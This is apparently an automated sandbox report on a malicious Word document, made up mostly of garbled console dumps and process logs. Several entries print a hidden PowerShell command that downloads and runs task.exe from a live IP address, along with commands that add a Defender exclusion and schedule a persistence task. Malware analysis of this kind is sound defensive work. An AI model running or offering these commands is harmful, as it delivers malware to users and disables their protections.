Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._................E.k......................W.............}..v....X.......0...............x"z.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k...............1E.k......................W.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k................E.k......................W.............}..v....P.......0...............x"z.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E.E.....w...............1E.k.... %z...............W.............}..v............0.......................f.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w................E.k....@.................W.............}..v............0...............x"z.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ .......1E.k.... %z...............W.............}..v....P.......0................!z.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................E.k......................W.............}..v............0...............x"z.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E.E........................k......z...............W.............}..v.....H......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....I................W.............}..v.....J......0.................z.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k......z...............W.............}..v.....P......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k....HQ................W.............}..v.....Q......0.................z.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.3.7.............}..v.....U......0...............h.z.....$.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....V................W.............}..v.....W......0.................z.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k......z...............W.............}..v.....]......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....^................W.............}..v....._......0.................z.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k......................W.............}..v.....e......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....f................W.............}..v.....g......0.................z.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k...e.x.e.'.Hk......0...............h.z.....8.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....l................W.............}..v.....l......0.................z.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k......z...............W.............}..v....Hs......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....t................W.............}..v.....t......0.................z.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v.....x......0...............h.z.....&.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k....Py................W.............}..v.....y......0.................z.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k......z...............W.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k....P.................W.............}..v............0.................z.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0...............h.z.....<.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k......................W.............}..v....H.......0.................z.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ ..........k......z...............W.............}..v............0...............h.z.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k......................W.............}..v............0.................z.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................p.......#.................7.....p.........7.......2.....`I4........v.....................K;.....................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............Ev.k......................W.............}..v....0.......0.................x.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...h.......0...............X.x.....6.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../...............Ev.k.... .................W.............}..v............0.................x.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.W.............}..v............0...............X.x.....".......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;...............Ev.k....h.................W.............}..v............0.................x.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G................q.k......x...............W.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G...............Ev.k....h.................W.............}..v............0.................x.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S................q.k......x...............W.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............Ev.k....h.................W.............}..v............0.................x.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._.......u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k...e.x.e.'. .......0...............X.x.....8.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._...............Ev.k......................W.............}..v....X.......0.................x.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k................q.k......................W.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k...............Ev.k......................W.............}..v....P.......0.................x.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E.E.....w................q.k......x...............W.............}..v............0.......................f.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w...............Ev.k....@.................W.............}..v............0.................x.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ ........q.k......x...............W.............}..v....P.......0...............X.x.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Ev.k......................W.............}..v............0.................x.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E.E.....................u..k....0.x...............W.............}..v.....H......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....I................W.............}..v.....J......0.................x.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................u..k....0.x...............W.............}..v.....P......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k....HQ................W.............}..v.....Q......0.................x.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.3.7.............}..v.....U......0.................x.....$.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....V................W.............}..v.....W......0.................x.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................u..k....0.x...............W.............}..v.....]......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....^................W.............}..v....._......0.................x.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................u..k......................W.............}..v.....e......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....f................W.............}..v.....g......0.................x.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k...e.x.e.'.Hk......0.................x.....8.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....l................W.............}..v.....l......0.................x.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................u..k....0.x...............W.............}..v....Hs......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.....t................W.............}..v.....t......0.................x.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v.....x......0.................x.....&.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k....Py................W.............}..v.....y......0.................x.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................u..k....0.x...............W.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k....P.................W.............}..v............0.................x.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0.................x.....<.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k......................W.............}..v....H.......0.................x.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ .......u..k....0.x...............W.............}..v............0.................x.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k......................W.............}..v............0.................x.............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....L.......................g.......................0.......#.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....L...............................................0.......#.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....L...............................................0......./.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....L...............................................0......./.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....L...............................................0.......;...............\|.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....L...............................................0.......;.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......N.......................0.......G...............".......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.....L.......................o.......................0.......G.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....L...............................................0.......S.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....L...............................................0.......S.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_.........e.x.e.(.P.....L...............................................0......._.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....L...............................................0......._.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....L.......................4.......................0.......k.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....L.......................P.......................0.......k.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.....L...............................................0.......w.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....L...............................................0.......................l.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....L...............................................0...............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....L...............................................0...............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....L...............................................0...............................................	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................................h.......(.P.............................X.......................................................................	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\task.exe "C:\Users\user\AppData\Roaming\task.exe"
Source: C:\Users\user\AppData\Roaming\task.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe
Source: C:\Users\user\AppData\Roaming\task.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp
Source: C:\Users\user\AppData\Roaming\task.exe	Process created: C:\Users\user\AppData\Roaming\task.exe C:\Users\user\AppData\Roaming\task.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\task.exe "C:\Users\user\AppData\Roaming\task.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process created: C:\Users\user\AppData\Roaming\task.exe C:\Users\user\AppData\Roaming\task.exe	Jump to behavior

Source: C:\Users\user\AppData\Roaming\task.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\task.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\task.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\task.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\task.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\task.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\task.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\task.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\task.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD068.tmp

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Roaming\task.exe	Mutant created: \Sessions\1\BaseNamedObjects\hFVAGeNDDuOIYKYzrWNabcGxrk
Source: C:\Users\user\AppData\Roaming\task.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver

Source: task.exe	String found in binary or memory: /DriveIn;component/views/addbook.xaml
Source: task.exe	String found in binary or memory: views/addcustomer.baml
Source: task.exe	String found in binary or memory: views/addbook.baml
Source: task.exe	String found in binary or memory: /DriveIn;component/views/addcustomer.xaml
Source: task.exe	String found in binary or memory: /DriveIn;component/views/addbook.xaml
Source: task.exe	String found in binary or memory: views/addcustomer.baml
Source: task.exe	String found in binary or memory: views/addbook.baml
Source: task.exe	String found in binary or memory: /DriveIn;component/views/addcustomer.xaml

Source: 14.0.task.exe.400000.11.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 14.0.task.exe.400000.11.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Users\user\AppData\Roaming\task.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: :\Windows\dll\mscorlib.pdb0 source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: :\Windows\mscorlib.pdb, source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp

Source: ~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: task[1].exe.0.dr, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: task.exe.3.dr, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
